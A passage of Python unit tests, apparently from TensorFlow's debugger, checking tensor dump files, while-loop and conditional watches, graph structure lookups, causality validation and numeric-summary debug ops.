self.assertFalse(s_vals[0].initialized)
# Call run() again, to check that u is initialized properly.
self.assertAllClose(u_init_val, sess.run(u))
self.assertEqual(s_init_val, sess.run(s))
def testDebugWhileLoopGeneratesMultipleDumps(self):
with session.Session(config=no_rewrite_session_config()) as sess:
num_iter = 10
# "u" is the Variable being updated in the loop.
u_name = "testDumpToFileWhileLoop/u"
u_namespace = u_name.split("/")[0]
u_init_val = np.array(11.0)
u_init = constant_op.constant(u_init_val)
u = variables.Variable(u_init, name=u_name)
# "v" is the increment.
v_name = "testDumpToFileWhileLoop/v"
v_namespace = v_name.split("/")[0]
v_init_val = np.array(2.0)
v_init = constant_op.constant(v_init_val)
v = variables.Variable(v_init, name=v_name)
u.initializer.run()
v.initializer.run()
i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")
def cond(i):
return math_ops.less(i, num_iter)
def body(i):
new_u = state_ops.assign_add(u, v)
new_i = math_ops.add(i, 1)
op = control_flow_ops.group(new_u)
new_i = control_flow_ops.with_dependencies([op], new_i)
return [new_i]
loop = control_flow_ops.while_loop(
cond, body, [i], parallel_iterations=10)
# Create RunOptions for debug-watching tensors
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Identity.
debug_utils.add_debug_tensor_watch(
run_options, "while/Identity", 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Add/y.
debug_utils.add_debug_tensor_watch(
run_options, "while/Add/y", 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(loop, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
self.assertEqual(num_iter, r)
u_val_final = sess.run(u)
self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
# Verify dump files
self.assertTrue(os.path.isdir(self._dump_root))
u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
v_glob_out = glob.glob(os.path.join(
self._dump_root, "*", v_namespace, "v"))
self.assertTrue(os.path.isdir(u_glob_out[0]))
self.assertTrue(os.path.isdir(v_glob_out[0]))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
# and 10 iterations of while/Add/y.
self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
# Verify tensor values.
self.assertAllClose([u_init_val],
dump.get_tensors(u_name, 0, "DebugIdentity"))
self.assertAllClose([v_init_val],
dump.get_tensors("%s/read" % v_name, 0,
"DebugIdentity"))
while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
self.assertEqual(10, len(while_id_tensors))
for k in xrange(len(while_id_tensors)):
self.assertAllClose(np.array(k), while_id_tensors[k])
# Verify ascending timestamps from the while loops.
while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
"DebugIdentity")
while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
"DebugIdentity")
self.assertEqual(10, len(while_id_rel_timestamps))
prev_rel_time = 0
prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
while_id_dump_sizes_bytes):
self.assertGreaterEqual(rel_time, prev_rel_time)
self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
prev_rel_time = rel_time
prev_dump_size_bytes = dump_size_bytes
# Test querying debug watch keys from node name.
watch_keys = dump.debug_watch_keys("while/Identity")
self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
# Test querying debug datum instances from debug watch key.
self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
self.assertEqual([], dump.watch_key_to_data("foo"))
def testDebugWhileLoopWatchingWholeGraphWorks(self):
with session.Session() as sess:
loop_body = lambda i: math_ops.add(i, 2)
loop_cond = lambda i: math_ops.less(i, 16)
i = constant_op.constant(10, name="i")
loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
loop_result, dump = self._debug_run_and_get_dump(sess, loop)
self.assertEqual(16, loop_result)
self.assertEqual(
[[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
self.assertEqual(
[[12], [14], [16]],
dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
def testDebugTrainingDynamicRNNWorks(self):
with session.Session() as sess:
input_size = 3
state_size = 2
time_steps = 4
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
concat_inputs = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
outputs_dynamic, _ = rnn.dynamic_rnn(
_RNNCellForTest(input_size, state_size),
inputs=concat_inputs,
sequence_length=sequence_length,
time_major=True,
dtype=dtypes.float32)
toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(toy_loss, name="train_op")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph_with_blacklists(
run_options,
sess.graph,
node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
debug_urls=self._debug_urls())
# b/36870549: Nodes with these name patterns need to be excluded from
# tfdbg in order to prevent MSAN warnings of uninitialized Tensors
# under both file:// and grpc:// debug URL schemes.
run_metadata = config_pb2.RunMetadata()
sess.run(train_op, feed_dict={concat_inputs: input_values},
options=run_options, run_metadata=run_metadata)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testDebugCondWatchingWholeGraphWorks(self):
with session.Session() as sess:
x = variables.Variable(10.0, name="x")
y = variables.Variable(20.0, name="y")
cond = control_flow_ops.cond(
x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
sess.run(variables.global_variables_initializer())
cond_result, dump = self._debug_run_and_get_dump(sess, cond)
self.assertEqual(21, cond_result)
self.assertAllClose(
[21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
def testFindNodesWithBadTensorValues(self):
with session.Session() as sess:
u_name = "testFindNodesWithBadTensorValues/u"
v_name = "testFindNodesWithBadTensorValues/v"
w_name = "testFindNodesWithBadTensorValues/w"
x_name = "testFindNodesWithBadTensorValues/x"
y_name = "testFindNodesWithBadTensorValues/y"
z_name = "testFindNodesWithBadTensorValues/z"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant([2.0, 1.0])
v = variables.Variable(v_init, name=v_name)
# Expected output: [0.0, 3.0]
w = math_ops.subtract(u, v, name=w_name)
# Expected output: [inf, 1.3333]
x = math_ops.div(u, w, name=x_name)
# Expected output: [nan, 4.0]
y = math_ops.multiply(w, x, name=y_name)
z = math_ops.multiply(y, y, name=z_name)
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, z,
expected_partition_graph_count=self._expected_partition_graph_count)
def has_bad_value(_, tensor):
return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))
# Find all "offending tensors".
bad_data = dump.find(has_bad_value)
# Verify that the nodes with bad values are caught through running find
# on the debug dump.
self.assertEqual(3, len(bad_data))
self.assertEqual(x_name, bad_data[0].node_name)
self.assertEqual(y_name, bad_data[1].node_name)
self.assertEqual(z_name, bad_data[2].node_name)
# Test first_n kwarg of find(): Find the first offending tensor.
first_bad_datum = dump.find(has_bad_value, first_n=1)
self.assertEqual(1, len(first_bad_datum))
self.assertEqual(x_name, first_bad_datum[0].node_name)
def _session_run_for_graph_structure_lookup(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_name = "testDumpGraphStructureLookup/u"
v_name = "testDumpGraphStructureLookup/v"
w_name = "testDumpGraphStructureLookup/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, w,
expected_partition_graph_count=self._expected_partition_graph_count)
return u_name, v_name, w_name, dump
def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
# Test num_devices().
self.assertEqual(self._expected_num_devices, len(dump.devices()))
# Test node_device().
self.assertEqual(self._main_device, dump.node_device(u_name))
with self.assertRaisesRegexp(ValueError,
"does not exist in partition graphs"):
dump.node_device(u_name + "foo")
# Test node_exists().
self.assertTrue(dump.node_exists(u_name))
self.assertTrue(dump.node_exists(u_name + "/read"))
self.assertFalse(dump.node_exists(u_name + "/read" + "/foo"))
def testGraphStructureLookupGivesNodesAndAttributes(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
u_read_name = u_name + "/read"
# Test node name list lookup of the DebugDumpDir object.
if test_util.gpu_device_name():
node_names = dump.nodes(
device_name="/job:localhost/replica:0/task:0/device:GPU:0")
else:
node_names = dump.nodes()
self.assertTrue(u_name in node_names)
self.assertTrue(u_read_name in node_names)
# Test querying node attributes.
u_attr = dump.node_attributes(u_name)
self.assertEqual(dtypes.float32, u_attr["dtype"].type)
self.assertEqual(1, len(u_attr["shape"].shape.dim))
self.assertEqual(2, u_attr["shape"].shape.dim[0].size)
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_attributes("foo")
def testGraphStructureLookupGivesDebugWatchKeys(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
# Test querying the debug watch keys with node names.
self.assertEqual(["%s:0:DebugIdentity" % u_name],
dump.debug_watch_keys(u_name))
self.assertEqual(["%s:0:DebugIdentity" % v_name],
dump.debug_watch_keys(v_name))
self.assertEqual(["%s:0:DebugIdentity" % w_name],
dump.debug_watch_keys(w_name))
self.assertEqual([], dump.debug_watch_keys("foo"))
# Test querying debug datum instances from debug watch.
u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
self.assertEqual(1, len(u_data))
self.assertEqual(u_name, u_data[0].node_name)
self.assertEqual(0, u_data[0].output_slot)
self.assertEqual("DebugIdentity", u_data[0].debug_op)
self.assertGreaterEqual(u_data[0].timestamp, 0)
self.assertEqual([], dump.watch_key_to_data("foo"))
def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
u_read_name = u_name + "/read"
# Test the inputs lookup of the DebugDumpDir object.
self.assertEqual([], dump.node_inputs(u_name))
self.assertEqual([u_name], dump.node_inputs(u_read_name))
self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
self.assertEqual([v_name] * 2, dump.node_inputs(w_name))
self.assertEqual([], dump.node_inputs(u_name, is_control=True))
self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
self.assertEqual([], dump.node_inputs(v_name, is_control=True))
self.assertEqual([], dump.node_inputs(w_name, is_control=True))
# Test the outputs recipient lookup of the DebugDumpDir object.
self.assertTrue(u_read_name in dump.node_recipients(u_name))
self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
self.assertEqual(2, dump.node_recipients(v_name).count(w_name))
self.assertEqual([], dump.node_recipients(u_name, is_control=True))
self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
self.assertEqual([], dump.node_recipients(v_name, is_control=True))
self.assertEqual([], dump.node_recipients(w_name, is_control=True))
# Test errors raised on invalid node names.
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_inputs(u_name + "foo")
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_recipients(u_name + "foo")
# Test transitive_inputs().
self.assertEqual([], dump.transitive_inputs(u_name))
self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
self.assertEqual(
set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
self.assertEqual(
set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.transitive_inputs(u_name + "foo")
def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
_, _, _, dump = self._session_run_for_graph_structure_lookup()
# Now load the dump again, without the partition graphs, so we can check
# errors are not raised because the partition graphs are loaded from the
# dump directory.
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertTrue(dump.loaded_partition_graphs())
def testGraphPathFindingOnControlEdgesWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
v1 = variables.Variable(1.0, name="v1")
v2 = variables.Variable(2.0, name="v2")
v3 = variables.Variable(3.0, name="v3")
a = math_ops.add(v1, v2, name="a")
with ops.control_dependencies([a]):
c = math_ops.subtract(v3, v3, name="c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, c)
self.assertEqual(["v1", "v1/read", "a", "c"],
dump.find_some_path("v1", "c"))
self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
def testGraphPathFindingReverseRefEdgeWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
v = variables.Variable(10.0, name="v")
delta = variables.Variable(1.0, name="delta")
inc_v = state_ops.assign_add(v, delta, name="inc_v")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, inc_v)
self.assertEqual(
["delta", "delta/read", "inc_v", "v"],
dump.find_some_path("delta", "v", include_reversed_ref=True))
self.assertIsNone(dump.find_some_path("delta", "v"))
def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_name = "testDumpCausalityCheck/u"
v_name = "testDumpCausalityCheck/v"
w_name = "testDumpCausalityCheck/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# First, loading the original dump without supplying the
# partition_graphs should not cause a LookupError, validation occurs
# only with partition_graphs loaded.
debug_data.DebugDumpDir(self._dump_root)
# Now, loading the original dump with partition graphs supplied should
# succeed. The validation should pass quietly.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Get the dump file names and compute their timestamps.
self.assertEqual(
1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]
self.assertEqual(
1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]
v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])
# Swap and slightly shift the time stamps of the last two dumped tensors,
# to simulate "causality violation", which can happen if the dump
# directory contains incomplete data and/or mixes data from different
# Session.run() calls.
v_file_path_1 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
v_timestamp - 1)
os.rename(v_file_path, v_file_path_1)
os.rename(w_file_path, w_file_path_1)
# Load the dump directory again. Now a ValueError is expected to be
# raised due to the timestamp swap.
with self.assertRaisesRegexp(ValueError, "Causality violated"):
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Loading the dump directory with kwarg "validate" set explicitly to
# False should get rid of the error.
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=False)
# Next, set the two times stamps to be the same, which should be fine.
v_file_path_2 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_2 = w_file_path[:w_file_path.rindex(
"_")] + "_%d" % w_timestamp
os.rename(v_file_path_1, v_file_path_2)
os.rename(w_file_path_1, w_file_path_2)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
with session.Session() as sess:
x_name = "oneOfTwoSlots/x"
u_name = "oneOfTwoSlots/u"
v_name = "oneOfTwoSlots/v"
w_name = "oneOfTwoSlots/w"
y_name = "oneOfTwoSlots/y"
x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
sess.run(x.initializer)
unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)
v = math_ops.add(unique_x, unique_x, name=v_name)
w = math_ops.add(indices, indices, name=w_name)
y = math_ops.add(w, w, name=y_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
# Watch only the first output slot of u, even though it has two output
# slots.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, w_name, 0, debug_urls=self._debug_urls())
debug_utils.add_debug_tensor_watch(
run_options, y_name, 0, debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run([v, y], options=run_options, run_metadata=run_metadata)
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=True)
self.assertAllClose([1, 3, 7],
dump.get_tensors(u_name, 0, "DebugIdentity")[0])
def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
"""Test watching output slots not attached to any outgoing edges."""
with session.Session(config=no_rewrite_session_config()) as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
u = constant_op.constant(u_init_val, shape=[2, 2], name="u")
# Create a control edge from a node with an output: From u to z.
# Node u will get executed only because of the control edge. The output
# tensor u:0 is not attached to any outgoing edge in the graph. This test
# checks that the debugger can watch such a tensor.
with ops.control_dependencies([u]):
z = control_flow_ops.no_op(name="z")
_, dump = self._debug_run_and_get_dump(sess, z)
# Assert that the DebugIdentity watch on u works properly.
self.assertEqual(1, len(dump.dumped_tensor_data))
datum = dump.dumped_tensor_data[0]
self.assertEqual("u", datum.node_name)
self.assertEqual(0, datum.output_slot)
self.assertEqual("DebugIdentity", datum.debug_op)
self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
"""Watch output slots on Variable-updating ops, with no emitted edges."""
with session.Session(config=no_rewrite_session_config()) as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="gdo/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="gdo/v")
w = math_ops.multiply(u, v, name="gdo/w")
# gdo stands for GradientDescentOptimizer.
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(
w, name="gdo/train")
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(sess, train_op)
update_u_data = dump.watch_key_to_data(
"gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_u_data))
# Gradient descent on u: w = u * v, so dw / du = v.
# Updated value of u should be:
# 10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
self.assertAllClose(8.0, update_u_data[0].get_tensor())
update_v_data = dump.watch_key_to_data(
"gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
self.assertEqual(1, len(update_v_data))
# Gradient descent on u: w = u * v, so dw / dv = u.
# Updated value of u should be:
# 20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
self.assertAllClose(19.0, update_v_data[0].get_tensor())
# Verify that the Variables u and v are updated properly.
self.assertAllClose(8.0, sess.run(u))
self.assertAllClose(19.0, sess.run(v))
def testAllowsWatchingUnconnectedOutputTensor(self):
"""Watch an output slot not emitting any edges.
(Not even control edges from the node.)
"""
with session.Session() as sess:
x_init = constant_op.constant([2, 2, 3, 5, 5])
x = variables.Variable(x_init, name="unconnected/x")
# The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
# graph. Let the debugger watch the unused slot 1.
unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")
x.initializer.run()
# Verify that only slot 0 of unique_x has recipients, while slot 1 of the
# same node does not have recipients.
unique_x_slot_0_recipients = []
unique_x_slot_1_recipients = []
for op in sess.graph.get_operations():
for inp in op.inputs:
if inp.name == "unconnected/unique_x:0":
unique_x_slot_0_recipients.append(op.name)
elif inp.name == "unconnected/unique_x:1":
unique_x_slot_1_recipients.append(op.name)
self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
self.assertEqual([], unique_x_slot_1_recipients)
y_result, dump = self._debug_run_and_get_dump(sess, y)
self.assertAllClose([2, 4, 7], y_result)
# Assert that the connected slot (slot 0) is dumped properly.
unique_x_slot_0_dumps = dump.watch_key_to_data(
"unconnected/unique_x:0:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_0_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_0_dumps[0].node_name)
self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())
# Assert that the unconnected slot (slot 1) is dumped properly.
unique_x_slot_1_dumps = dump.watch_key_to_data(
"unconnected/unique_x:1:DebugIdentity")
self.assertEqual(1, len(unique_x_slot_1_dumps))
self.assertEqual("unconnected/unique_x",
unique_x_slot_1_dumps[0].node_name)
self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
self.assertAllClose([0, 0, 1, 2, 2],
unique_x_slot_1_dumps[0].get_tensor())
def testSuccessiveDebuggingRunsIncreasesCounters(self):
"""Test repeated Session.run() calls with debugger increments counters."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
x = array_ops.transpose(ph, name="mismatch/x")
y = array_ops.squeeze(ph, name="mismatch/y")
_, dump1 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
self.assertEqual(1, dump1.core_metadata.global_step)
self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
self.assertEqual(0, dump1.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump1.core_metadata.input_names)
self.assertEqual([x.name], dump1.core_metadata.output_names)
self.assertEqual([], dump1.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
# Calling run() with the same feed, same output and same debug watch
# options should increment both session_run_index and
# executor_step_index.
_, dump2 = self._debug_run_and_get_dump(
sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
self.assertEqual(2, dump2.core_metadata.global_step)
self.assertEqual(dump1.core_metadata.session_run_index + 1,
dump2.core_metadata.session_run_index)
self.assertEqual(dump1.core_metadata.executor_step_index + 1,
dump2.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump2.core_metadata.input_names)
self.assertEqual([x.name], dump2.core_metadata.output_names)
self.assertEqual([], dump2.core_metadata.target_nodes)
shutil.rmtree(self._dump_root)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)
# Calling run() with a different output should increment
# session_run_index, but not executor_step_index.
_, dump3 = self._debug_run_and_get_dump(
sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
self.assertEqual(3, dump3.core_metadata.global_step)
self.assertEqual(dump2.core_metadata.session_run_index + 1,
dump3.core_metadata.session_run_index)
self.assertEqual(0, dump3.core_metadata.executor_step_index)
self.assertEqual([ph.name], dump3.core_metadata.input_names)
self.assertEqual([y.name], dump3.core_metadata.output_names)
self.assertEqual([], dump3.core_metadata.target_nodes)
def testDebuggingDuringOpError(self):
"""Test the debug tensor dumping when error occurs in graph runtime."""
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
x = array_ops.transpose(ph, name="mismatch/x")
m = constant_op.constant(
np.array(
[[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
y = math_ops.matmul(m, x, name="mismatch/y")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.OpError):
sess.run(y,
options=run_options,
feed_dict={ph: np.array([[-3.0], [0.0]])})
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
self.assertEqual([ph.name], dump.core_metadata.input_names)
self.assertEqual([y.name], dump.core_metadata.output_names)
self.assertEqual([], dump.core_metadata.target_nodes)
# Despite the fact that the run() call errored out and partition_graphs
# are not available via run_metadata, the partition graphs should still
# have been loaded from the dump directory.
self.assertTrue(dump.loaded_partition_graphs())
m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
self.assertEqual(1, len(m_dumps))
self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())
x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
self.assertEqual(1, len(x_dumps))
self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(
[
np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
-np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
],
dtype=np.float32,
name="numeric_summary/a")
b = variables.Variable(
[0.0] * 18, dtype=np.float32, name="numeric_summary/b")
c = math_ops.add(a, b, name="numeric_summary/c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(
sess, c, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
self.assertAllClose([[
1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
8.97959184, 1.0, 1.0, 18.0
]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
with session.Session() as sess:
a = variables.Variable(
[42], dtype=np.float32, name="numeric_summary_uninit/a")
_, dump = self._debug_run_and_get_dump(
sess, a.initializer, debug_ops=["DebugNumericSummary"])
self.assertTrue(dump.loaded_partition_graphs())
# DebugNumericSummary output should reflect the uninitialized state of
# the watched tensor.
numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
"DebugNumericSummary")[0]
self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
numeric_summary[0:8])
# Check dtype (index 12), ndims (index 13) and dimension sizes (index
# 14+).
self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])
self.assertTrue(np.isinf(numeric_summary[8]))
self.assertGreater(numeric_summary[8], 0.0)
self.assertTrue(np.isinf(numeric_summary[9]))
self.assertLess(numeric_summary[9], 0.0)
self.assertTrue(np.isnan(numeric_summary[10]))
self.assertTrue(np.isnan(numeric_summary[11]))
def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
with session.Session() as sess:
a = variables.Variable("1", name="a")
b = variables.Variable("3", name="b")
c = variables.Variable("2", name="c")
d = math_ops.add(a, b, name="d")
e = math_ops.add(d, c, name="e")
n = parsing_ops.string_to_number(e, name="n")
m = math_ops.add(n, n, name="m")
sess.run(variables.global_variables_initializer())
# Using DebugNumericSummary on sess.run(m) with the default
# tolerate_debug_op_creation_failures=False should error out due to the
# presence of string-dtype Tensors in the graph.
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary"],
debug_urls=self._debug_urls())
with self.assertRaises(errors.FailedPreconditionError):
sess.run(m, options=run_options, run_metadata=run_metadata)
# Using tolerate_debug_op_creation_failures=True should get rid of the
# error.
m_result, dump = self._debug_run_and_get_dump(
sess, m, debug_ops=["DebugNumericSummary"],
tolerate_debug_op_creation_failures=True)
self.assertEqual(264, m_result)
# The integer-dtype Tensors in the graph should have been dumped
# properly.
self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_.:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"2 attribute key\(s\) were not valid for debug node "
